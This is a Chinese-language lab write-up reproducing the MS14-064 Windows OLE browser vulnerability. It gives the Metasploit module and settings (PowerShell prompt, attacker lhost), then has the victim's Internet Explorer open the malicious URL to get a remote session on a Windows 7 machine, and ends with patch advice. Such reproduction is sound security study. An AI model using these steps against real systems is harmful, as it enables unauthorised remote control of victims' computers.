MS14-064漏洞复现
摘要
此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。
漏洞影响版本
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 和 Windows 8.1
Windows Server 2012 和 Windows Server 2012 R2
Windows RT 和 Windows RT 8.1
服务器核心安装选项
实验环境
攻击机:kali(192.168.109.128)
受害机:win7(192.168.109.129)
漏洞复现
首先保证两台机器之间的连通性
进入msfconsole
选择MS14-064漏洞利用的payload和进行参数配置
use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set lhost 192.168.109.128
exploit
可以看到在生成的payload里面发现恶意url
打开win7的ie浏览器,访问这个恶意url
可以看到在kali的msfconsole里面成功收到会话
成功拿到win7权限,漏洞复现成功
漏洞修复
去微软官网下载补丁或将操作系统进行升级